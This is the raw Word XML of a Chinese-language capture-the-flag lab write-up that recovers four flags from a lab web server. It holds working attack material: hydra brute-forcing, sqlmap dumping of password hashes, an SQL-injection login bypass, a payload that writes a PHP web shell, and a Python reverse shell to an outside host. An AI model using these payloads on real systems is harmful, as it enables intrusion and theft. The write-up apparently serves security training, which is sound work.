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54055" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Write UP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A21AD0F" w14:textId="35644ACB" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考试人员：</w:t>
      </w:r>
      <w:r w:rsidR="000822D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>郑淼淼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F8EA6C" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机地址：http://192.168.36.204:9006</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40460022" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="587FFC74" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4104E1C1" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用nmap扫描靶机地址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73558D5D" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo nmap -sS -T4 -Pn -n -vvv --open --max-retries=0 -A -sV -sC -p9006 -oA nmap 192.168.36.204</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341D2A56" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="43240B21" wp14:editId="58CBD2D8">
            <wp:extent cx="5274310" cy="6621145"/>
            <wp:effectExtent l="9525" t="9525" r="1206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1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E0154" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PORT     STATE SERVICE REASON         VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB5D66D" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9006/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.56 ((Debian))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EFBE14" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>|_http-title: Apache2 Ubuntu Default Page: It works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385C0518" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">| http-robots.txt: 1 disallowed entry </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3C3F10" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>|_/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4C1E61" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>|_http-server-header: Apache/2.4.56 (Debian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423659B6" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">| http-methods: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1C793A" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>|_  Supported Methods: GET POST OPTIONS HEAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7163854D" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可见其中存在robots.txt文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FDD602" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问robots.txt可见第一个flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5207C818" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>flag{8502b86364db09ed82c5099b959f4296}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F94117F" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1E648ADA" wp14:editId="122F93A2">
            <wp:extent cx="5271135" cy="188087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6FE145" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6521ED61" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面为debian apache默认页面，无其他信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619C8FDB" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用dirsearch对靶机进行扫描：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E47BACB" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="463F5770" wp14:editId="070A3643">
            <wp:extent cx="5269865" cy="571182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1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D5EFB7" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中info.php文件可获得web路径（默认路径）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A59FD86" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095FC072" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2DD06243" wp14:editId="2E56677A">
            <wp:extent cx="4181475" cy="257175"/>
            <wp:effectExtent l="9525" t="9525" r="1905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7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682D2" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>upload目录中无文件，但推测可写入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB58EFA" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin为一个登录页面。仔细观察burp结果或页面源码，在最底部可见flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3ADABF" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>flag{31e59925156a1d08d01e58c0e4703c06}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E6A7A2" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="43CC8392" wp14:editId="17E0401F">
            <wp:extent cx="5271135" cy="1647825"/>
            <wp:effectExtent l="9525" t="9525" r="1524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7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9A7F4" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="546CF4A9" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Ref24945"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="72F2D9FF" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000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1-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴力破解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A20D56" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录页面尝试进行弱口令暴力破解：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E68645" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hydra -l admin -P ~/rockyou.txt -s 9006 192.168.36.204 http-post-form '/admin/:username=^USER^&amp;password=^PASS^:</w:t>
      </w:r>
      <w:r>
        <w:t>Your Login Name or Password is invalid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB9B95F" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样可以使用burp，此处不再展开详述。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06091CC0" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得弱口令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A09DCF" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD2E08B" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1108B510" wp14:editId="1616EB73">
            <wp:extent cx="5269865" cy="1664335"/>
            <wp:effectExtent l="0" t="0" r="698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FD263E" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用 admin / admin123 成功登录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B0C1CF" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="7007FF42" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Ref26421"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2-SQLMAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间盲注</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="7DD877BD" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在sql注入，使用sqlmap获取密码关键数据：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74769C19" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap -r r.txt -p username --dbms=mysql --technique=T --current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054F5077" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ECE8F90" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65667934" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27449D54" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap -r r.txt -p username --dbms=mysql --technique=T -D admin --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E546667" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E92A73" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>users, flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0E5DFC" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24386F14" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap -r r.txt -p username --dbms=mysql --technique=T -D admin -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240A26A3" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="347902EC" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+----+----------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2171EB0F" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>| id | password                         | username |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A535154" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+----+----------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5963C3CE" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>| 1  | 0192023a7bbd73250516f069df18b500 | admin    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635B89D4" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+----+----------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C37B9B" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B69D13B" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="558CC22A" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="1401974F" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码为md5格式保存，使用cmd5或hashcat等获得密码为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C166135" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219BE7E0" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="08535CF1" wp14:editId="01214BF1">
            <wp:extent cx="5274310" cy="1208405"/>
            <wp:effectExtent l="9525" t="9525" r="12065" b="203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1B49FF" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="32F2C2BC" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用 admin / admin123 成功登录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26256CF5" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="04D1B17F" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000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3-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>万能口令登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B931B57" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用基于SQL注入的万能口令可成功登录：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558CE060" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin'# / &lt;任意密码&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1888A1D0" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="4CB4615C" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Ref24968"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4-SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WebShell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="3F07D41F" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用基于SQL注入的方法，在可写目录upload中直接写入WebShell：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6190F7" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>' union select '&lt;?php system($_REQUEST[1]);?&gt;' into outfile '/var/www/html/upload/1.php'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C031630" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="1D773410" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="756B0D7A" wp14:editId="26F0F29D">
            <wp:extent cx="4467225" cy="2609850"/>
            <wp:effectExtent l="9525" t="9525" r="190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09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510C6" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="049848A1" wp14:editId="612708ED">
            <wp:extent cx="4953000" cy="933450"/>
            <wp:effectExtent l="9525" t="9525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33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12FEF" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="1A08998D" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（后续可直接反弹shell）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F77E44" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="6FB3D632" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D3C71" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录后可见flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7493B1" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag{94e6eb2bed0ef9b50d4eda09376e1924}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5652C291" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="318E4E08" wp14:editId="3B544BE5">
            <wp:extent cx="5270500" cy="1000760"/>
            <wp:effectExtent l="9525" t="9525" r="1587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0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F29A4" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="3AED40CF" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>flag4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADC22EF" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可代码执行直接反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A350D95" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>||$(which python||which python3) -c 'import pty,os,socket as S;s=S.socket(S.AF_INET,S.SOCK_STREAM);s.connect(("192.168.36.63",443));O=os.dup2;n=s.fileno();O(n,0);O(n,1);O(n,2);pty.spawn("bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5056D00A" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="2D77F157" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2BF05281" wp14:editId="3D99EF30">
            <wp:extent cx="5269865" cy="1370965"/>
            <wp:effectExtent l="9525" t="9525" r="1651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09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26B0C" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="5981A065" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样可使用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_Ref24945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flag3</w:t>
